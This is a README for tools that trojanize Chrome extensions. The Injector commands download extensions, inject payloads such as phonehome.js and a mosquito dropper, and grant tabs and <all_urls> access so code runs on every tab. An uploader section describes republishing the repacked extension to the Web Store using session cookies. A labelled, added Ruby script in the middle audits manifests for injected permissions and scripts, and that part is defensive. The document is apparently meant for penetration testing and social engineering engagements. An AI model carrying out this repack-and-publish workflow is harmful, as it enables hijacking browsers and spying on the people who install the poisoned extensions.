Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.

Authors:

- Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
- Michele '@antisnatchor' Orru

Injector
--------
A bunch of scripts for injecting new code into existing extensions.
Extensions can be downloaded from the Chrome Web Store (repacker-webstore) or taken from crx files (repacker-crx).

Requirements:

- bash
- ruby
- zip (cmd line)
- curl (cmd line)
- Google Chrome (used in crx mode only)

Usage:

    # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

    # Same, but pack into repacked.zip instead
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

    # Create new CRX with Google Chrome
    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

    # Inject into existing CRX file
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js

    # Add some permissions into manifest.json
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"

    # Add persistent content script file launching on every tab
    $ echo 'console.log(location.href)' > cs.js
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):

    # start mosquito server:
    $ cd path/to/mosquito
    $ python mosquito/start.py 8082 4444 --http 8000

    # generate mosquito hook:
    # - visit http://localhost:8000/generate
    # - save hook as cs.js

    # inject mosquito dropper into extension:
    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

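
The usage above adds permissions such as `"tabs,<all_urls>"` to manifest.json and a content script that runs on every tab. The following check is an added example, not part of the original tools: it compares a known-good manifest.json with the one from a suspect copy of an extension and reports what was added. The name `audit_manifest` and both sample manifests are constructed for illustration, and it assumes the changes show up in the standard `permissions` and `content_scripts` manifest keys.

```ruby
require 'json'
require 'set'

# Match patterns that make a permission or content script apply to every site.
BROAD_PATTERNS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'].freeze

# Collect the [match pattern, js file] pairs declared under content_scripts.
def content_script_pairs(manifest)
  (manifest['content_scripts'] || []).flat_map do |cs|
    (cs['matches'] || []).product(cs['js'] || [])
  end.to_set
end

# Compare a trusted manifest with a suspect one; return a list of findings.
def audit_manifest(trusted_json, suspect_json)
  trusted = JSON.parse(trusted_json)
  suspect = JSON.parse(suspect_json)
  findings = []

  # Permissions present only in the suspect copy.
  added_perms = (suspect['permissions'] || []) - (trusted['permissions'] || [])
  added_perms.each do |perm|
    level = BROAD_PATTERNS.include?(perm) ? 'HIGH' : 'WARN'
    findings << "#{level}: permission added: #{perm}"
  end

  # Content scripts present only in the suspect copy.
  (content_script_pairs(suspect) - content_script_pairs(trusted)).each do |match, js|
    level = BROAD_PATTERNS.include?(match) ? 'HIGH' : 'WARN'
    findings << "#{level}: content script added: #{js} on #{match}"
  end
  findings
end

# Constructed sample manifests (not taken from any real extension).
TRUSTED = <<~JSON
  {"name": "Sample", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage"],
   "content_scripts": [{"matches": ["https://example.com/*"], "js": ["page.js"]}]}
JSON
SUSPECT = <<~JSON
  {"name": "Sample", "version": "1.0", "manifest_version": 2,
   "permissions": ["storage", "tabs", "<all_urls>"],
   "content_scripts": [{"matches": ["https://example.com/*"], "js": ["page.js"]},
                       {"matches": ["<all_urls>"], "js": ["cs.js"]}]}
JSON

puts audit_manifest(TRUSTED, SUSPECT) if __FILE__ == $PROGRAM_NAME
```
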
Webstore Uploader
-----------------
Script for uploading and publishing Chrome Extensions packed in zip files to the Chrome Web Store.

Requirements:

- ruby

Usage:

    # Preparation:

    1. Create Chrome developer account
    2. Log in at https://chrome.google.com/webstore/developer/dashboard/
    3. Pay your $5 one-time fee (credit card needed)
    4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file

    # Get Chrome extension code
    # e.g. run Injector in zip mode:

    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

    # (optional) - prepare screenshot / description file

    # publish the extension right away
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png

    # or just upload & save it:
    $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png

    # you can access the extension from your developer dashboard